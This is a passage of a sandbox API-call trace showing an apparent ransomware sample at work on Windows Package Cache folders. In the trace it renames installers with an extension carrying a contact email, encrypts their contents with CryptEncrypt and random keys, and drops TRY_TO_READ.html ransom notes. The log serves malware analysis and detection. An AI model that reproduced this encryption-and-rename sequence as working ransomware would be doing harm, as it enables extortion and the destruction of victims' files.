Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 89 [0167.808] GetProcessHeap () returned 0x2e0000 [0167.808] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x118) returned 0x319788 [0167.808] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" [0167.808] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0167.808] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.813] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b4 [0167.814] GetProcessHeap () returned 0x2e0000 [0167.814] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0167.814] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=455576) returned 1 [0167.814] SetFilePointer (in: hFile=0x5b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x6f398 [0167.814] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.814] GetProcessHeap () returned 0x2e0000 [0167.814] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.814] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.814] WriteFile (in: hFile=0x5b4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.816] WriteFile (in: hFile=0x5b4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.816] WriteFile (in: hFile=0x5b4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.817] ReadFile (in: hFile=0x5b4, lpBuffer=0x30f0048, nNumberOfBytesToRead=0x6f398, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesRead=0x2acf9c8*=0x6f398, lpOverlapped=0x0) returned 1 [0167.828] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.828] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.828] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", dwFileAttributes=0x80) returned 1 [0167.834] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 82 [0167.834] GetProcessHeap () returned 0x2e0000 [0167.834] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x319788 [0167.834] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" [0167.834] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" [0167.834] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.837] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b4 [0167.838] GetProcessHeap () returned 0x2e0000 [0167.838] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0167.838] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=654) returned 1 [0167.838] SetFilePointer (in: hFile=0x5b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x28e [0167.838] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.838] GetProcessHeap () returned 0x2e0000 [0167.838] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.838] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.838] WriteFile (in: hFile=0x5b4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.839] WriteFile (in: hFile=0x5b4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.840] WriteFile (in: hFile=0x5b4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.840] ReadFile (in: hFile=0x5b4, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x28e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x28e, lpOverlapped=0x0) returned 1 [0167.840] SetFilePointer (in: hFile=0x5b4, lDistanceToMove=-654, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.840] WriteFile (in: hFile=0x5b4, lpBuffer=0x3d66a8*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d66a8*, lpNumberOfBytesWritten=0x2acf9c8*=0x28e, lpOverlapped=0x0) returned 1 [0167.840] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xb1a43e90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1a43e90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1fa8 [0167.840] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b8 [0167.841] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb1a43e90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1a43e90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1fe8 [0167.842] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5bc [0167.844] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb1a69ff0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1a69ff0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b2028 [0167.844] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.844] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.844] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe", dwFileAttributes=0x80) returned 1 [0167.844] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned 90 [0167.844] GetProcessHeap () returned 0x2e0000 [0167.844] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x11a) returned 0x319788 [0167.844] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" [0167.844] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0167.844] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.847] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c0 [0167.847] GetProcessHeap () returned 0x2e0000 [0167.848] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0167.848] GetFileSizeEx (in: hFile=0x5c0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=781880) returned 1 [0167.848] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xbee38 [0167.848] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.848] GetProcessHeap () returned 0x2e0000 [0167.848] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.848] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.848] WriteFile (in: hFile=0x5c0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.849] WriteFile (in: hFile=0x5c0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.850] WriteFile (in: hFile=0x5c0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.850] ReadFile (in: hFile=0x5c0, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xbee38, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xbee38, lpOverlapped=0x0) returned 1 [0167.887] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.887] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.887] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", dwFileAttributes=0x80) returned 1 [0167.887] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned 82 [0167.887] GetProcessHeap () returned 0x2e0000 [0167.887] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x319788 [0167.887] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" [0167.887] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" [0167.887] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.890] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c0 [0167.890] GetProcessHeap () returned 0x2e0000 [0167.890] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0167.890] GetFileSizeEx (in: hFile=0x5c0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=766) returned 1 [0167.890] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2fe [0167.890] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.890] GetProcessHeap () returned 0x2e0000 [0167.890] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.890] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.891] WriteFile (in: hFile=0x5c0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.892] WriteFile (in: hFile=0x5c0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.892] WriteFile (in: hFile=0x5c0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.892] ReadFile (in: hFile=0x5c0, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x2fe, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x2fe, lpOverlapped=0x0) returned 1 [0167.893] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=-766, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.893] WriteFile (in: hFile=0x5c0, lpBuffer=0x3d6718*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6718*, lpNumberOfBytesWritten=0x2acf9c8*=0x2fe, lpOverlapped=0x0) returned 1 [0167.893] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xb1ab62b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1ab62b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b2068 [0167.894] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.894] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.894] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe", dwFileAttributes=0x80) returned 1 [0167.895] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 89 [0167.895] GetProcessHeap () returned 0x2e0000 [0167.895] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x118) returned 0x319788 [0167.895] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" [0167.895] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0167.895] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.897] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0167.897] GetProcessHeap () returned 0x2e0000 [0167.897] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, 